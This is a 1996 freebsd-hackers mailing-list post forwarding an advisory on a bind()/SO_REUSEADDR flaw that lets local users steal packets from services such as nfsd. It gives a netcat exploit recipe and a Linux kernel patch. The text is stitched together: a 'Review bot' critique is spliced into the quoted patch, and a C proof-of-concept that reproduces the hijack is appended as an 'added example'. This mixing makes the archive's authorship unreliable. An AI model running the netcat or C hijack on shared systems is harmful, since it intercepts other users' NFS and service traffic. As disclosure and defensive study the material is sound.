List: freebsd-hackers
Subject: bind() bug in almost all OS'es
From: guido () gvr ! win ! tue ! nl (Guido van Rooij)
Date: 1996-01-31 22:14:58
I posted this on security. This is severe in my eyes.
Fortunately there is still the concept of reserved ports but
it does not help sniffing nfs ports :-(
-Guido
Aleph's K-Rad GECOS Field wrote:
> From owner-freebsd-security@freefall.freebsd.org Wed Jan 31 16:00:48 1996
> X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
> Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
> From: "Aleph's K-Rad GECOS Field" <aleph1@underground.org>
> To: linux-security@tarsier.cv.nrao.edu
> cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com,
> best-of-security@suburbia.net
> Subject: BoS: bind() Security Problems
> Message-ID: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: nobody@mail.uu.net
> Sender: owner-security@FreeBSD.org
> Precedence: bulk
>
>
> System Call: bind()
> Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
> Probably others.
> Requirement: account on system.
> Security Compromise: Stealing packets from
> nfsd, yppasswd, ircd, etc.
> Credits: *Hobbit* <hobbit@avian.org>
> bitblt <bitblt@infosoc.com>
> Aleph One <aleph1@underground.org>
> Synopsis: bind() does not properly check
> to make sure there is not a socket
> already bound to INADDR_ANY on the same
> port when binding to a specific address.
>
> On most systems, a combination of setting the SO_REUSEADDR
> socket option, and a call to bind() allows any process to bind to
> a port to which a previous process has bound with INADDR_ANY. This
> allows a user to bind to the specific address of a server bound to
> INADDR_ANY on an unprivileged port, and steal its udp packets/tcp
> connection.
>
> Exploit:
>
> Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz
> Make sure an nfs server is running:
>
> w00p% netstat -a | grep 2049
> udp 0 0 *.2049 *.* LISTEN
>
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
>
> Wait for packets to arrive.
>
> Fix:
>
> Linux: A patch has been sent to Linus and Alan Cox. It should be
> included with 1.3.60. My original patch (included below) allows for
> binds from the same uid, as some virtual hosting software like modified
> httpds, and ftpds, may break otherwise.
>
> Alan didn't like this, so all binds to the same port will
> not be allowed in newer kernels. You should be able to easily adapt
> this patch or Alan's patch to 1.2.13 without much trouble.
>
> Others: Pray to your vendors.
>
> --- begin patch ---
>
>
> diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c
> --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995
> +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996
> @@ -46,6 +46,8 @@
> * Germano Caronni : Assorted small races.
> * Alan Cox : sendmsg/recvmsg basic support.
> * Alan Cox : Only sendmsg/recvmsg now supported.
> + * Aleph One : Rogue processes could steal packets
> + * from processes bound to INADDR_ANY.
> *
> * This program is free software; you can redistribute it and/or
> * modify it under the terms of the GNU General Public License
> @@ -899,6 +901,12 @@
>
> if (sk2->num != snum)
> continue; /* more than one */
> + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) &&
> + current->euid != sk2->socket->inode->i_uid)
> + {
> + sti();
> + return(-EADDRINUSE);
> + }
> if (sk2->rcv_saddr != sk->rcv_saddr)
> continue; /* socket per slot ! -FB */
> if (!sk2->reuse || sk2->state==TCP_LISTEN)
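Review bot: the new test dereferences sk2->socket->inode->i_uid for every socket that shares snum, with no check that sk2->socket and its inode are non-NULL; the loop reaches this point for any socket on the port, including ones that are closed but still in the table, so if any such socket has dropped its struct socket this becomes a kernel NULL dereference inside bind(). Guard the chain first (for example "if (!sk2->socket || !sk2->socket->inode || current->euid != sk2->socket->inode->i_uid)") and treat a socket with no recoverable owner as a conflict, returning -EADDRINUSE after the same sti() used here. Note also that the comparison is against the inode owner rather than any particular process, so the exemption covers every process running with the same euid as the creator of the wildcard socket; that matches the intent stated in the message but deserves a mention in the changelog line above, which currently describes only the rogue-process case.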
>
>
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5
> Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
>
>
>
>
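The hijack that the netcat recipe above performs against nfsd, reproduced as an added example that is not part of the original advisory, of netcat, or of the Linux patch: one C program plays both the INADDR_ANY server and the SO_REUSEADDR attacker on the loopback interface, sends a datagram it constructs itself to the server's port, and reports which socket received it. The function name probe_hijack, the result codes, the kernel-chosen (hence unprivileged) port, and the 500 ms poll timeout are this example's own choices. On kernels that carry the fix, the attacker's bind() is expected to fail with EADDRINUSE unless the wildcard socket itself set SO_REUSEADDR, which is the case the second run exercises.

```c
/*
 * Added example (not from the original advisory, netcat, or the Linux patch).
 *
 *   victim   : UDP socket bound to INADDR_ANY:<port>, SO_REUSEADDR optional
 *   attacker : UDP socket with SO_REUSEADDR bound to 127.0.0.1:<port>
 *   sender   : sends one constructed datagram ("ping") to 127.0.0.1:<port>
 *
 * Result codes, names and timeout below are this example's own choices.
 */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

enum probe_result {
    PROBE_ERROR = -1,      /* socket setup failed (no loopback, etc.)        */
    PROBE_BIND_REFUSED,    /* attacker's bind() got EADDRINUSE: victim safe  */
    PROBE_HIJACKED,        /* attacker bound and received the datagram       */
    PROBE_VICTIM_GOT_IT    /* attacker bound, but the victim still got it    */
};

/* Create a UDP socket, optionally with SO_REUSEADDR set before bind(). */
static int udp_socket(int reuseaddr)
{
    int one = 1;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0)
        return -1;
    if (reuseaddr && setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Return 0 if fd_a becomes readable, 1 if fd_b does, -1 on timeout/error. */
static int wait_for_datagram(int fd_a, int fd_b, int timeout_ms)
{
    struct pollfd p[2] = { { .fd = fd_a, .events = POLLIN },
                           { .fd = fd_b, .events = POLLIN } };
    if (poll(p, 2, timeout_ms) <= 0)
        return -1;
    if (p[0].revents & POLLIN) return 0;
    if (p[1].revents & POLLIN) return 1;
    return -1;
}

/* Run the collision once; victim_sets_reuseaddr selects the server's option. */
int probe_hijack(int victim_sets_reuseaddr)
{
    int victim = -1, attacker = -1, sender = -1;
    int result = PROBE_ERROR;
    struct sockaddr_in any = { 0 }, specific = { 0 };
    socklen_t len = sizeof any;
    char buf[16];

    /* Victim: the server of the advisory, INADDR_ANY on a kernel-chosen port. */
    victim = udp_socket(victim_sets_reuseaddr);
    if (victim < 0) goto out;
    any.sin_family = AF_INET;
    any.sin_addr.s_addr = htonl(INADDR_ANY);
    any.sin_port = 0;
    if (bind(victim, (struct sockaddr *)&any, sizeof any) < 0) goto out;
    if (getsockname(victim, (struct sockaddr *)&any, &len) < 0) goto out;

    /* Attacker: SO_REUSEADDR, then bind() a specific address on the same port. */
    attacker = udp_socket(1);
    if (attacker < 0) goto out;
    specific.sin_family = AF_INET;
    specific.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    specific.sin_port = any.sin_port;
    if (bind(attacker, (struct sockaddr *)&specific, sizeof specific) < 0) {
        result = (errno == EADDRINUSE) ? PROBE_BIND_REFUSED : PROBE_ERROR;
        goto out;
    }

    /* A client sends one datagram to the server's address: who receives it? */
    sender = udp_socket(0);
    if (sender < 0) goto out;
    if (sendto(sender, "ping", 4, 0, (struct sockaddr *)&specific, sizeof specific) != 4)
        goto out;

    switch (wait_for_datagram(attacker, victim, 500)) {
    case 0: (void)recv(attacker, buf, sizeof buf, 0); result = PROBE_HIJACKED;      break;
    case 1: (void)recv(victim,   buf, sizeof buf, 0); result = PROBE_VICTIM_GOT_IT; break;
    default: break;
    }
out:
    if (victim >= 0)   close(victim);
    if (attacker >= 0) close(attacker);
    if (sender >= 0)   close(sender);
    return result;
}

int main(void)
{
    static const char *names[] = { "bind refused (protected)", "hijacked", "victim received" };
    int r = probe_hijack(0);
    printf("victim without SO_REUSEADDR: %s\n", r < 0 ? "error" : names[r]);
    r = probe_hijack(1);
    printf("victim with    SO_REUSEADDR: %s\n", r < 0 ? "error" : names[r]);
    return 0;
}
```

The second run is the caveat a practitioner should take from this thread: a wildcard-bound UDP service that itself sets SO_REUSEADDR (a common habit for fast restarts) reopens the hole to any local user even on kernels that carry the fix, because the more specific binding wins delivery. Binding the service to its specific addresses, or on Linux using SO_REUSEPORT (which requires every socket on the port to share the same effective UID), closes it.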